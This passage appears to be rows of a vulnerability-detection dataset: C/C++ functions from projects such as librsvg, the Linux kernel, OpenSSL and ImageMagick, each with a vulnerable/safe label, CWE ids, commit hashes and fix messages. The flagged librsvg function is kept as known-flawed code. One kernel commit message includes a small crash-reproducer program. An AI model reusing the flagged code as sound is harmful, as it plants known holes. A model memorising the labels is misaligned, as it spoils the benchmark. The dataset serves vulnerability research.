if (g_str_equal (value, "evenodd")) state->clip_rule = CAIRO_FILL_RULE_EVEN_ODD; else state->has_clip_rule = FALSE; } else if (g_str_equal (name, "stroke")) { RsvgPaintServer *stroke = state->stroke; state->stroke = rsvg_paint_server_parse (&state->has_stroke_server, ctx->priv->defs, value, 0); rsvg_paint_server_unref (stroke); } else if (g_str_equal (name, "stroke-width")) { state->stroke_width = _rsvg_css_parse_length (value); state->has_stroke_width = TRUE; } else if (g_str_equal (name, "stroke-linecap")) { state->has_cap = TRUE; if (g_str_equal (value, "butt")) state->cap = CAIRO_LINE_CAP_BUTT; else if (g_str_equal (value, "round")) state->cap = CAIRO_LINE_CAP_ROUND; else if (g_str_equal (value, "square")) state->cap = CAIRO_LINE_CAP_SQUARE; else g_warning (_("unknown line cap style %s\n"), value); } else if (g_str_equal (name, "stroke-opacity")) { state->stroke_opacity = rsvg_css_parse_opacity (value); state->has_stroke_opacity = TRUE; } else if (g_str_equal (name, "stroke-linejoin")) { state->has_join = TRUE; if (g_str_equal (value, "miter")) state->join = CAIRO_LINE_JOIN_MITER; else if (g_str_equal (value, "round")) state->join = CAIRO_LINE_JOIN_ROUND; else if (g_str_equal (value, "bevel")) state->join = CAIRO_LINE_JOIN_BEVEL; else g_warning (_("unknown line join style %s\n"), value); } else if (g_str_equal (name, "font-size")) { state->font_size = _rsvg_css_parse_length (value); state->has_font_size = TRUE; } else if (g_str_equal (name, "font-family")) { char *save = g_strdup (rsvg_css_parse_font_family (value, &state->has_font_family)); g_free (state->font_family); state->font_family = save; } else if (g_str_equal (name, "xml:lang")) { char *save = g_strdup (value); g_free (state->lang); state->lang = save; state->has_lang = TRUE; } else if (g_str_equal (name, "font-style")) { state->font_style = rsvg_css_parse_font_style (value, &state->has_font_style); } else if (g_str_equal (name, "font-variant")) { state->font_variant = rsvg_css_parse_font_variant 
(value, &state->has_font_variant); } else if (g_str_equal (name, "font-weight")) { state->font_weight = rsvg_css_parse_font_weight (value, &state->has_font_weight); } else if (g_str_equal (name, "font-stretch")) { state->font_stretch = rsvg_css_parse_font_stretch (value, &state->has_font_stretch); } else if (g_str_equal (name, "text-decoration")) { if (g_str_equal (value, "inherit")) { state->has_font_decor = FALSE; state->font_decor = TEXT_NORMAL; } else { if (strstr (value, "underline")) state->font_decor |= TEXT_UNDERLINE; if (strstr (value, "overline")) state->font_decor |= TEXT_OVERLINE; if (strstr (value, "strike") || strstr (value, "line-through")) /* strike though or line-through */ state->font_decor |= TEXT_STRIKE; state->has_font_decor = TRUE; } } else if (g_str_equal (name, "direction")) { state->has_text_dir = TRUE; if (g_str_equal (value, "inherit")) { state->text_dir = PANGO_DIRECTION_LTR; state->has_text_dir = FALSE; } else if (g_str_equal (value, "rtl")) state->text_dir = PANGO_DIRECTION_RTL; else /* ltr */ state->text_dir = PANGO_DIRECTION_LTR; } else if (g_str_equal (name, "unicode-bidi")) { state->has_unicode_bidi = TRUE; if (g_str_equal (value, "inherit")) { state->unicode_bidi = UNICODE_BIDI_NORMAL; state->has_unicode_bidi = FALSE; } else if (g_str_equal (value, "embed")) state->unicode_bidi = UNICODE_BIDI_EMBED; else if (g_str_equal (value, "bidi-override")) state->unicode_bidi = UNICODE_BIDI_OVERRIDE; else /* normal */ state->unicode_bidi = UNICODE_BIDI_NORMAL; } else if (g_str_equal (name, "writing-mode")) { /* TODO: these aren't quite right... 
*/ state->has_text_dir = TRUE; state->has_text_gravity = TRUE; if (g_str_equal (value, "inherit")) { state->text_dir = PANGO_DIRECTION_LTR; state->has_text_dir = FALSE; state->text_gravity = PANGO_GRAVITY_SOUTH; state->has_text_gravity = FALSE; } else if (g_str_equal (value, "lr-tb") || g_str_equal (value, "lr")) { state->text_dir = PANGO_DIRECTION_LTR; state->text_gravity = PANGO_GRAVITY_SOUTH; } else if (g_str_equal (value, "rl-tb") || g_str_equal (value, "rl")) { state->text_dir = PANGO_DIRECTION_RTL; state->text_gravity = PANGO_GRAVITY_SOUTH; } else if (g_str_equal (value, "tb-rl") || g_str_equal (value, "tb")) { state->text_dir = PANGO_DIRECTION_LTR; state->text_gravity = PANGO_GRAVITY_EAST; } } else if (g_str_equal (name, "text-anchor")) { state->has_text_anchor = TRUE; if (g_str_equal (value, "inherit")) { state->text_anchor = TEXT_ANCHOR_START; state->has_text_anchor = FALSE; } else { if (strstr (value, "start")) state->text_anchor = TEXT_ANCHOR_START; else if (strstr (value, "middle")) state->text_anchor = TEXT_ANCHOR_MIDDLE; else if (strstr (value, "end")) state->text_anchor = TEXT_ANCHOR_END; } } else if (g_str_equal (name, "letter-spacing")) { state->has_letter_spacing = TRUE; state->letter_spacing = _rsvg_css_parse_length (value); } else if (g_str_equal (name, "stop-color")) { if (!g_str_equal (value, "inherit")) { state->stop_color = rsvg_css_parse_color (value, &state->has_stop_color); } } else if (g_str_equal (name, "stop-opacity")) { if (!g_str_equal (value, "inherit")) { state->has_stop_opacity = TRUE; state->stop_opacity = rsvg_css_parse_opacity (value); } } else if (g_str_equal (name, "marker-start")) { state->startMarker = rsvg_marker_parse (ctx->priv->defs, value); state->has_startMarker = TRUE; } else if (g_str_equal (name, "marker-mid")) { state->middleMarker = rsvg_marker_parse (ctx->priv->defs, value); state->has_middleMarker = TRUE; } else if (g_str_equal (name, "marker-end")) { state->endMarker = rsvg_marker_parse (ctx->priv->defs, 
value); state->has_endMarker = TRUE; } else if (g_str_equal (name, "stroke-miterlimit")) { state->has_miter_limit = TRUE; state->miter_limit = g_ascii_strtod (value, NULL); } else if (g_str_equal (name, "stroke-dashoffset")) { state->has_dashoffset = TRUE; state->dash.offset = _rsvg_css_parse_length (value); if (state->dash.offset.length < 0.) state->dash.offset.length = 0.; } else if (g_str_equal (name, "shape-rendering")) { state->has_shape_rendering_type = TRUE; if (g_str_equal (value, "auto") || g_str_equal (value, "default")) state->shape_rendering_type = SHAPE_RENDERING_AUTO; else if (g_str_equal (value, "optimizeSpeed")) state->shape_rendering_type = SHAPE_RENDERING_OPTIMIZE_SPEED; else if (g_str_equal (value, "crispEdges")) state->shape_rendering_type = SHAPE_RENDERING_CRISP_EDGES; else if (g_str_equal (value, "geometricPrecision")) state->shape_rendering_type = SHAPE_RENDERING_GEOMETRIC_PRECISION; } else if (g_str_equal (name, "text-rendering")) { state->has_text_rendering_type = TRUE; if (g_str_equal (value, "auto") || g_str_equal (value, "default")) state->text_rendering_type = TEXT_RENDERING_AUTO; else if (g_str_equal (value, "optimizeSpeed")) state->text_rendering_type = TEXT_RENDERING_OPTIMIZE_SPEED; else if (g_str_equal (value, "optimizeLegibility")) state->text_rendering_type = TEXT_RENDERING_OPTIMIZE_LEGIBILITY; else if (g_str_equal (value, "geometricPrecision")) state->text_rendering_type = TEXT_RENDERING_GEOMETRIC_PRECISION; } else if (g_str_equal (name, "stroke-dasharray")) { state->has_dash = TRUE; if (g_str_equal (value, "none")) { if (state->dash.n_dash != 0) { /* free any cloned dash data */ g_free (state->dash.dash); state->dash.dash = NULL; state->dash.n_dash = 0; } } else { gchar **dashes = g_strsplit (value, ",", -1); if (NULL != dashes) { gint n_dashes, i; gboolean is_even = FALSE; gdouble total = 0; /* count the #dashes */ for (n_dashes = 0; dashes[n_dashes] != NULL; n_dashes++); is_even = (n_dashes % 2 == 0); state->dash.n_dash = 
(is_even ? n_dashes : n_dashes * 2); state->dash.dash = g_new (double, state->dash.n_dash); /* TODO: handle negative value == error case */ /* the even and base case */ for (i = 0; i < n_dashes; i++) { state->dash.dash[i] = g_ascii_strtod (dashes[i], NULL); total += state->dash.dash[i]; } /* if an odd number of dashes is found, it gets repeated */ if (!is_even) for (; i < state->dash.n_dash; i++) state->dash.dash[i] = state->dash.dash[i - n_dashes]; g_strfreev (dashes); /* If the dashes add up to 0, then it should be ignored */ if (total == 0) { g_free (state->dash.dash); state->dash.dash = NULL; state->dash.n_dash = 0; } } } } }
1
[ "CWE-20" ]
librsvg
d1c9191949747f6dcfd207831d15dd4ba00e31f2
66,552,833,168,416,300,000,000,000,000,000,000,000
388
state: Store mask as reference Instead of immediately looking up the mask, store the reference and look it up on use.
Value ExpressionBsonSize::evaluate(const Document& root, Variables* variables) const { Value arg = _children[0]->evaluate(root, variables); if (arg.nullish()) return Value(BSONNULL); uassert(31393, str::stream() << "$bsonSize requires a document input, found: " << typeName(arg.getType()), arg.getType() == BSONType::Object); return Value(arg.getDocument().toBson().objsize()); }
0
[]
mongo
1772b9a0393b55e6a280a35e8f0a1f75c014f301
75,138,442,077,873,490,000,000,000,000,000,000,000
13
SERVER-49404 Enforce additional checks in $arrayToObject
tsize_t t2p_write_pdf_xobject_palettecs_stream(T2P* t2p, TIFF* output){ tsize_t written=0; written += t2p_write_pdf_stream( (tdata_t) t2p->pdf_palette, (tsize_t) t2p->pdf_palettesize, output); return(written); }
0
[ "CWE-787" ]
libtiff
7be2e452ddcf6d7abca88f41d3761e6edab72b22
178,668,200,132,061,750,000,000,000,000,000,000,000
11
tiff2pdf.c: properly calculate datasize when saving to JPEG YCbCr fixes #220
pci_emul_add_pciecap(struct pci_vdev *dev, int type) { int err; struct pciecap pciecap; if (type != PCIEM_TYPE_ROOT_PORT) return -1; bzero(&pciecap, sizeof(pciecap)); pciecap.capid = PCIY_EXPRESS; pciecap.pcie_capabilities = PCIECAP_VERSION | PCIEM_TYPE_ROOT_PORT; pciecap.link_capabilities = 0x411; /* gen1, x1 */ pciecap.link_status = 0x11; /* gen1, x1 */ err = pci_emul_add_capability(dev, (u_char *)&pciecap, sizeof(pciecap)); return err; }
0
[ "CWE-617", "CWE-703" ]
acrn-hypervisor
6199e653418eda58cd698d8769820904453e2535
307,105,363,114,329,800,000,000,000,000,000,000,000
18
dm: validate the input in 'pci_emul_mem_handler()' checking the inputs explicitly instead of using Assert. Tracked-On: #4003 Signed-off-by: Yonghua Huang <[email protected]> Reviewed-by: Shuo Liu <[email protected]> Acked-by: Yu Wang <[email protected]>
static size_t snd_compr_calc_avail(struct snd_compr_stream *stream, struct snd_compr_avail *avail) { memset(avail, 0, sizeof(*avail)); snd_compr_update_tstamp(stream, &avail->tstamp); /* Still need to return avail even if tstamp can't be filled in */ if (stream->runtime->total_bytes_available == 0 && stream->runtime->state == SNDRV_PCM_STATE_SETUP && stream->direction == SND_COMPRESS_PLAYBACK) { pr_debug("detected init and someone forgot to do a write\n"); return stream->runtime->buffer_size; } pr_debug("app wrote %lld, DSP consumed %lld\n", stream->runtime->total_bytes_available, stream->runtime->total_bytes_transferred); if (stream->runtime->total_bytes_available == stream->runtime->total_bytes_transferred) { if (stream->direction == SND_COMPRESS_PLAYBACK) { pr_debug("both pointers are same, returning full avail\n"); return stream->runtime->buffer_size; } else { pr_debug("both pointers are same, returning no avail\n"); return 0; } } avail->avail = stream->runtime->total_bytes_available - stream->runtime->total_bytes_transferred; if (stream->direction == SND_COMPRESS_PLAYBACK) avail->avail = stream->runtime->buffer_size - avail->avail; pr_debug("ret avail as %lld\n", avail->avail); return avail->avail; }
0
[ "CWE-703" ]
linux
6217e5ede23285ddfee10d2e4ba0cc2d4c046205
162,429,048,695,875,880,000,000,000,000,000,000,000
35
ALSA: compress: fix an integer overflow check I previously added an integer overflow check here but looking at it now, it's still buggy. The bug happens in snd_compr_allocate_buffer(). We multiply ".fragments" and ".fragment_size" and that doesn't overflow but then we save it in an unsigned int so it truncates the high bits away and we allocate a smaller than expected size. Fixes: b35cc8225845 ('ALSA: compress_core: integer overflow in snd_compr_allocate_buffer()') Signed-off-by: Dan Carpenter <[email protected]> Signed-off-by: Takashi Iwai <[email protected]>
dns_zone_flush(dns_zone_t *zone) { isc_result_t result = ISC_R_SUCCESS; bool dumping; REQUIRE(DNS_ZONE_VALID(zone)); LOCK_ZONE(zone); DNS_ZONE_SETFLAG(zone, DNS_ZONEFLG_FLUSH); if (DNS_ZONE_FLAG(zone, DNS_ZONEFLG_NEEDDUMP) && zone->masterfile != NULL) { result = ISC_R_ALREADYRUNNING; dumping = was_dumping(zone); } else dumping = true; UNLOCK_ZONE(zone); if (!dumping) result = zone_dump(zone, true); /* Unknown task. */ return (result); }
0
[ "CWE-327" ]
bind9
f09352d20a9d360e50683cd1d2fc52ccedcd77a0
173,745,244,903,399,580,000,000,000,000,000,000,000
19
Update keyfetch_done compute_tag check If in keyfetch_done the compute_tag fails (because for example the algorithm is not supported), don't crash, but instead ignore the key.
static int nfs4_verify_channel_attrs(struct nfs41_create_session_args *args, struct nfs41_create_session_res *res) { int ret; ret = nfs4_verify_fore_channel_attrs(args, res); if (ret) return ret; return nfs4_verify_back_channel_attrs(args, res); }
0
[ "CWE-787" ]
linux
b4487b93545214a9db8cbf32e86411677b0cca21
266,510,953,336,912,230,000,000,000,000,000,000,000
10
nfs: Fix getxattr kernel panic and memory overflow Move the buffer size check to decode_attr_security_label() before memcpy() Only call memcpy() if the buffer is large enough Fixes: aa9c2669626c ("NFS: Client implementation of Labeled-NFS") Signed-off-by: Jeffrey Mitchell <[email protected]> [Trond: clean up duplicate test of label->len != 0] Signed-off-by: Trond Myklebust <[email protected]>
static inline void posix_cpu_timers_init(struct task_struct *tsk) { }
0
[ "CWE-416", "CWE-703" ]
linux
2b7e8665b4ff51c034c55df3cff76518d1a9ee3a
131,907,813,316,772,970,000,000,000,000,000,000,000
1
fork: fix incorrect fput of ->exe_file causing use-after-free Commit 7c051267931a ("mm, fork: make dup_mmap wait for mmap_sem for write killable") made it possible to kill a forking task while it is waiting to acquire its ->mmap_sem for write, in dup_mmap(). However, it was overlooked that this introduced an new error path before a reference is taken on the mm_struct's ->exe_file. Since the ->exe_file of the new mm_struct was already set to the old ->exe_file by the memcpy() in dup_mm(), it was possible for the mmput() in the error path of dup_mm() to drop a reference to ->exe_file which was never taken. This caused the struct file to later be freed prematurely. Fix it by updating mm_init() to NULL out the ->exe_file, in the same place it clears other things like the list of mmaps. This bug was found by syzkaller. It can be reproduced using the following C program: #define _GNU_SOURCE #include <pthread.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/wait.h> #include <unistd.h> static void *mmap_thread(void *_arg) { for (;;) { mmap(NULL, 0x1000000, PROT_READ, MAP_POPULATE|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); } } static void *fork_thread(void *_arg) { usleep(rand() % 10000); fork(); } int main(void) { fork(); fork(); fork(); for (;;) { if (fork() == 0) { pthread_t t; pthread_create(&t, NULL, mmap_thread, NULL); pthread_create(&t, NULL, fork_thread, NULL); usleep(rand() % 10000); syscall(__NR_exit_group, 0); } wait(NULL); } } No special kernel config options are needed. It usually causes a NULL pointer dereference in __remove_shared_vm_struct() during exit, or in dup_mmap() (which is usually inlined into copy_process()) during fork. Both are due to a vm_area_struct's ->vm_file being used after it's already been freed. 
Google Bug Id: 64772007 Link: http://lkml.kernel.org/r/[email protected] Fixes: 7c051267931a ("mm, fork: make dup_mmap wait for mmap_sem for write killable") Signed-off-by: Eric Biggers <[email protected]> Tested-by: Mark Rutland <[email protected]> Acked-by: Michal Hocko <[email protected]> Cc: Dmitry Vyukov <[email protected]> Cc: Ingo Molnar <[email protected]> Cc: Konstantin Khlebnikov <[email protected]> Cc: Oleg Nesterov <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: Vlastimil Babka <[email protected]> Cc: <[email protected]> [v4.7+] Signed-off-by: Andrew Morton <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
static struct cmd_rcvr *find_cmd_rcvr(struct ipmi_smi *intf, unsigned char netfn, unsigned char cmd, unsigned char chan) { struct cmd_rcvr *rcvr; list_for_each_entry_rcu(rcvr, &intf->cmd_rcvrs, link) { if ((rcvr->netfn == netfn) && (rcvr->cmd == cmd) && (rcvr->chans & (1 << chan))) return rcvr; } return NULL; }
0
[ "CWE-416", "CWE-284" ]
linux
77f8269606bf95fcb232ee86f6da80886f1dfae8
6,602,710,983,622,352,000,000,000,000,000,000,000
14
ipmi: fix use-after-free of user->release_barrier.rda When we do the following test, we got oops in ipmi_msghandler driver while((1)) do service ipmievd restart & service ipmievd restart done --------------------------------------------------------------- [ 294.230186] Unable to handle kernel paging request at virtual address 0000803fea6ea008 [ 294.230188] Mem abort info: [ 294.230190] ESR = 0x96000004 [ 294.230191] Exception class = DABT (current EL), IL = 32 bits [ 294.230193] SET = 0, FnV = 0 [ 294.230194] EA = 0, S1PTW = 0 [ 294.230195] Data abort info: [ 294.230196] ISV = 0, ISS = 0x00000004 [ 294.230197] CM = 0, WnR = 0 [ 294.230199] user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000a1c1b75a [ 294.230201] [0000803fea6ea008] pgd=0000000000000000 [ 294.230204] Internal error: Oops: 96000004 [#1] SMP [ 294.235211] Modules linked in: nls_utf8 isofs rpcrdma ib_iser ib_srpt target_core_mod ib_srp scsi_transport_srp ib_ipoib rdma_ucm ib_umad rdma_cm ib_cm iw_cm dm_mirror dm_region_hash dm_log dm_mod aes_ce_blk crypto_simd cryptd aes_ce_cipher ghash_ce sha2_ce ses sha256_arm64 sha1_ce hibmc_drm hisi_sas_v2_hw enclosure sg hisi_sas_main sbsa_gwdt ip_tables mlx5_ib ib_uverbs marvell ib_core mlx5_core ixgbe ipmi_si mdio hns_dsaf ipmi_devintf ipmi_msghandler hns_enet_drv hns_mdio [ 294.277745] CPU: 3 PID: 0 Comm: swapper/3 Kdump: loaded Not tainted 5.0.0-rc2+ #113 [ 294.285511] Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.37 11/21/2017 [ 294.292835] pstate: 80000005 (Nzcv daif -PAN -UAO) [ 294.297695] pc : __srcu_read_lock+0x38/0x58 [ 294.301940] lr : acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler] [ 294.307853] sp : ffff00001001bc80 [ 294.311208] x29: ffff00001001bc80 x28: ffff0000117e5000 [ 294.316594] x27: 0000000000000000 x26: dead000000000100 [ 294.321980] x25: dead000000000200 x24: ffff803f6bd06800 [ 294.327366] x23: 0000000000000000 x22: 0000000000000000 [ 294.332752] x21: ffff00001001bd04 x20: ffff80df33d19018 [ 294.338137] x19: ffff80df33d19018 x18: 
0000000000000000 [ 294.343523] x17: 0000000000000000 x16: 0000000000000000 [ 294.348908] x15: 0000000000000000 x14: 0000000000000002 [ 294.354293] x13: 0000000000000000 x12: 0000000000000000 [ 294.359679] x11: 0000000000000000 x10: 0000000000100000 [ 294.365065] x9 : 0000000000000000 x8 : 0000000000000004 [ 294.370451] x7 : 0000000000000000 x6 : ffff80df34558678 [ 294.375836] x5 : 000000000000000c x4 : 0000000000000000 [ 294.381221] x3 : 0000000000000001 x2 : 0000803fea6ea000 [ 294.386607] x1 : 0000803fea6ea008 x0 : 0000000000000001 [ 294.391994] Process swapper/3 (pid: 0, stack limit = 0x0000000083087293) [ 294.398791] Call trace: [ 294.401266] __srcu_read_lock+0x38/0x58 [ 294.405154] acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler] [ 294.410716] deliver_response+0x80/0xf8 [ipmi_msghandler] [ 294.416189] deliver_local_response+0x28/0x68 [ipmi_msghandler] [ 294.422193] handle_one_recv_msg+0x158/0xcf8 [ipmi_msghandler] [ 294.432050] handle_new_recv_msgs+0xc0/0x210 [ipmi_msghandler] [ 294.441984] smi_recv_tasklet+0x8c/0x158 [ipmi_msghandler] [ 294.451618] tasklet_action_common.isra.5+0x88/0x138 [ 294.460661] tasklet_action+0x2c/0x38 [ 294.468191] __do_softirq+0x120/0x2f8 [ 294.475561] irq_exit+0x134/0x140 [ 294.482445] __handle_domain_irq+0x6c/0xc0 [ 294.489954] gic_handle_irq+0xb8/0x178 [ 294.497037] el1_irq+0xb0/0x140 [ 294.503381] arch_cpu_idle+0x34/0x1a8 [ 294.510096] do_idle+0x1d4/0x290 [ 294.516322] cpu_startup_entry+0x28/0x30 [ 294.523230] secondary_start_kernel+0x184/0x1d0 [ 294.530657] Code: d538d082 d2800023 8b010c81 8b020021 (c85f7c25) [ 294.539746] ---[ end trace 8a7a880dee570b29 ]--- [ 294.547341] Kernel panic - not syncing: Fatal exception in interrupt [ 294.556837] SMP: stopping secondary CPUs [ 294.563996] Kernel Offset: disabled [ 294.570515] CPU features: 0x002,21006008 [ 294.577638] Memory Limit: none [ 294.587178] Starting crashdump kernel... [ 294.594314] Bye! 
Because the user->release_barrier.rda is freed in ipmi_destroy_user(), but the refcount is not zero, when acquire_ipmi_user() uses user->release_barrier.rda in __srcu_read_lock(), it causes oops. Fix this by calling cleanup_srcu_struct() when the refcount is zero. Fixes: e86ee2d44b44 ("ipmi: Rework locking and shutdown for hot remove") Cc: [email protected] # 4.18 Signed-off-by: Yang Yingliang <[email protected]> Signed-off-by: Corey Minyard <[email protected]>
int test_div(BIO *bp, BN_CTX *ctx) { BIGNUM a,b,c,d,e; int i; BN_init(&a); BN_init(&b); BN_init(&c); BN_init(&d); BN_init(&e); for (i=0; i<num0+num1; i++) { if (i < num1) { BN_bntest_rand(&a,400,0,0); BN_copy(&b,&a); BN_lshift(&a,&a,i); BN_add_word(&a,i); } else BN_bntest_rand(&b,50+3*(i-num1),0,0); a.neg=rand_neg(); b.neg=rand_neg(); BN_div(&d,&c,&a,&b,ctx); if (bp != NULL) { if (!results) { BN_print(bp,&a); BIO_puts(bp," / "); BN_print(bp,&b); BIO_puts(bp," - "); } BN_print(bp,&d); BIO_puts(bp,"\n"); if (!results) { BN_print(bp,&a); BIO_puts(bp," % "); BN_print(bp,&b); BIO_puts(bp," - "); } BN_print(bp,&c); BIO_puts(bp,"\n"); } BN_mul(&e,&d,&b,ctx); BN_add(&d,&e,&c); BN_sub(&d,&d,&a); if(!BN_is_zero(&d)) { fprintf(stderr,"Division test failed!\n"); return 0; } } BN_free(&a); BN_free(&b); BN_free(&c); BN_free(&d); BN_free(&e); return(1); }
0
[ "CWE-310" ]
openssl
a7a44ba55cb4f884c6bc9ceac90072dea38e66d0
129,067,452,262,468,770,000,000,000,000,000,000,000
63
Fix for CVE-2014-3570 (with minor bn_asm.c revamp). Reviewed-by: Emilia Kasper <[email protected]>
static __be32 fattr_handle_absent_fs(u32 *bmval0, u32 *bmval1, u32 *bmval2, u32 *rdattr_err) { /* As per referral draft: */ if (*bmval0 & ~WORD0_ABSENT_FS_ATTRS || *bmval1 & ~WORD1_ABSENT_FS_ATTRS) { if (*bmval0 & FATTR4_WORD0_RDATTR_ERROR || *bmval0 & FATTR4_WORD0_FS_LOCATIONS) *rdattr_err = NFSERR_MOVED; else return nfserr_moved; } *bmval0 &= WORD0_ABSENT_FS_ATTRS; *bmval1 &= WORD1_ABSENT_FS_ATTRS; *bmval2 &= WORD2_ABSENT_FS_ATTRS; return 0; }
0
[ "CWE-20", "CWE-129" ]
linux
f961e3f2acae94b727380c0b74e2d3954d0edf79
174,559,418,976,563,500,000,000,000,000,000,000,000
16
nfsd: encoders mustn't use unitialized values in error cases In error cases, lgp->lg_layout_type may be out of bounds; so we shouldn't be using it until after the check of nfserr. This was seen to crash nfsd threads when the server receives a LAYOUTGET request with a large layout type. GETDEVICEINFO has the same problem. Reported-by: Ari Kauppi <[email protected]> Reviewed-by: Christoph Hellwig <[email protected]> Cc: [email protected] Signed-off-by: J. Bruce Fields <[email protected]>
ProcessPtr handleSpawnResponse(const SpawnPreparationInfo &preparation, NegotiationDetails &details) { TRACE_POINT(); SocketListPtr sockets = make_shared<SocketList>(); while (true) { string line; try { line = readMessageLine(details); } catch (const SystemException &e) { throwAppSpawnException("An error occurred while starting the " "web application. There was an I/O error while reading its " "startup response: " + e.sys(), SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } catch (const TimeoutException &) { throwAppSpawnException("An error occurred while starting the " "web application: it did not write a startup response in time.", SpawnException::APP_STARTUP_TIMEOUT, details); } if (line.empty()) { throwAppSpawnException("An error occurred while starting the " "web application. It unexpected closed the connection while " "sending its startup response.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } else if (line[line.size() - 1] != '\n') { throwAppSpawnException("An error occurred while starting the " "web application. It sent a line without a newline character " "in its startup response.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } else if (line == "\n") { break; } string::size_type pos = line.find(": "); if (pos == string::npos) { throwAppSpawnException("An error occurred while starting the " "web application. 
It sent a startup response line without " "separator.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } string key = line.substr(0, pos); string value = line.substr(pos + 2, line.size() - pos - 3); if (key == "socket") { // socket: <name>;<address>;<protocol>;<concurrency> // TODO: in case of TCP sockets, check whether it points to localhost // TODO: in case of unix sockets, check whether filename is absolute // and whether owner is correct vector<string> args; split(value, ';', args); if (args.size() == 4) { string error = validateSocketAddress(preparation, details, args[1]); if (!error.empty()) { throwAppSpawnException( "An error occurred while starting the web application. " + error, SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } sockets->add(args[0], fixupSocketAddress(*details.options, args[1]), args[2], atoi(args[3])); } else { throwAppSpawnException("An error occurred while starting the " "web application. It reported a wrongly formatted 'socket'" "response value: '" + value + "'", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } } else { throwAppSpawnException("An error occurred while starting the " "web application. It sent an unknown startup response line " "called '" + key + "'.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } } if (sockets->hasSessionSockets() == 0) { throwAppSpawnException("An error occured while starting the web " "application. It did not advertise any session sockets.", SpawnException::APP_STARTUP_PROTOCOL_ERROR, details); } return make_shared<Process>(details.libev, details.pid, details.gupid, details.connectPassword, details.adminSocket, details.errorPipe, sockets, creationTime, details.spawnStartTime, config); }
0
[]
passenger
8c6693e0818772c345c979840d28312c2edd4ba4
236,240,472,906,062,350,000,000,000,000,000,000,000
98
Security check socket filenames reported by spawned application processes.
static MagickBooleanType EncodeLabImage(Image *image,ExceptionInfo *exception) { CacheView *image_view; MagickBooleanType status; ssize_t y; status=MagickTrue; image_view=AcquireAuthenticCacheView(image,exception); for (y=0; y < (ssize_t) image->rows; y++) { register Quantum *magick_restrict q; register ssize_t x; if (status == MagickFalse) continue; q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception); if (q == (Quantum *) NULL) { status=MagickFalse; continue; } for (x=0; x < (ssize_t) image->columns; x++) { double a, b; a=QuantumScale*GetPixela(image,q)-0.5; if (a < 0.0) a+=1.0; b=QuantumScale*GetPixelb(image,q)-0.5; if (b < 0.0) b+=1.0; SetPixela(image,QuantumRange*a,q); SetPixelb(image,QuantumRange*b,q); q+=GetPixelChannels(image); } if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse) status=MagickFalse; } image_view=DestroyCacheView(image_view); return(status); }
0
[ "CWE-125" ]
ImageMagick
803bc34ebe023f209f745baf8a112610ff77cc8c
123,988,102,557,264,340,000,000,000,000,000,000,000
51
Prevent possible buffer overflow when reading TIFF images (bug report from Shi Pu of MS509 Team)
bool CMerkleTx::AcceptToMemoryPool() { CTxDB txdb("r"); return AcceptToMemoryPool(txdb); }
0
[ "CWE-16", "CWE-787" ]
bitcoin
a206b0ea12eb4606b93323268fc81a4f1f952531
200,817,970,836,112,740,000,000,000,000,000,000,000
5
Do not allow overwriting unspent transactions (BIP 30) Introduce the following network rule: * a block is not valid if it contains a transaction whose hash already exists in the block chain, unless all that transaction's outputs were already spent before said block. Warning: this is effectively a network rule change, with potential risk for forking the block chain. Leaving this unfixed carries the same risk however, for attackers that can cause a reorganisation in part of the network. Thanks to Russell O'Connor and Ben Reeves.
set_default_modes (server *serv) { char modes[8]; modes[0] = '+'; modes[1] = '\0'; if (prefs.hex_irc_wallops) strcat (modes, "w"); if (prefs.hex_irc_servernotice) strcat (modes, "s"); if (prefs.hex_irc_invisible) strcat (modes, "i"); if (prefs.hex_irc_hidehost) strcat (modes, "x"); if (modes[1] != '\0') { serv->p_mode (serv, serv->nick, modes); } }
0
[ "CWE-22" ]
hexchat
4e061a43b3453a9856d34250c3913175c45afe9d
151,497,800,777,553,950,000,000,000,000,000,000,000
21
Clean up handling CAP LS
static int ZEND_FASTCALL ZEND_ADD_ARRAY_ELEMENT_SPEC_CONST_TMP_HANDLER(ZEND_OPCODE_HANDLER_ARGS) { zend_op *opline = EX(opline); zend_free_op free_op2; zval *array_ptr = &EX_T(opline->result.u.var).tmp_var; zval *expr_ptr; zval *offset=_get_zval_ptr_tmp(&opline->op2, EX(Ts), &free_op2 TSRMLS_CC); #if 0 || IS_CONST == IS_VAR || IS_CONST == IS_CV zval **expr_ptr_ptr = NULL; if (opline->extended_value) { expr_ptr_ptr=NULL; expr_ptr = *expr_ptr_ptr; } else { expr_ptr=&opline->op1.u.constant; } #else expr_ptr=&opline->op1.u.constant; #endif if (0) { /* temporary variable */ zval *new_expr; ALLOC_ZVAL(new_expr); INIT_PZVAL_COPY(new_expr, expr_ptr); expr_ptr = new_expr; } else { #if 0 || IS_CONST == IS_VAR || IS_CONST == IS_CV if (opline->extended_value) { SEPARATE_ZVAL_TO_MAKE_IS_REF(expr_ptr_ptr); expr_ptr = *expr_ptr_ptr; Z_ADDREF_P(expr_ptr); } else #endif if (IS_CONST == IS_CONST || PZVAL_IS_REF(expr_ptr)) { zval *new_expr; ALLOC_ZVAL(new_expr); INIT_PZVAL_COPY(new_expr, expr_ptr); expr_ptr = new_expr; zendi_zval_copy_ctor(*expr_ptr); } else { Z_ADDREF_P(expr_ptr); } } if (offset) { switch (Z_TYPE_P(offset)) { case IS_DOUBLE: zend_hash_index_update(Z_ARRVAL_P(array_ptr), zend_dval_to_lval(Z_DVAL_P(offset)), &expr_ptr, sizeof(zval *), NULL); break; case IS_LONG: case IS_BOOL: zend_hash_index_update(Z_ARRVAL_P(array_ptr), Z_LVAL_P(offset), &expr_ptr, sizeof(zval *), NULL); break; case IS_STRING: zend_symtable_update(Z_ARRVAL_P(array_ptr), 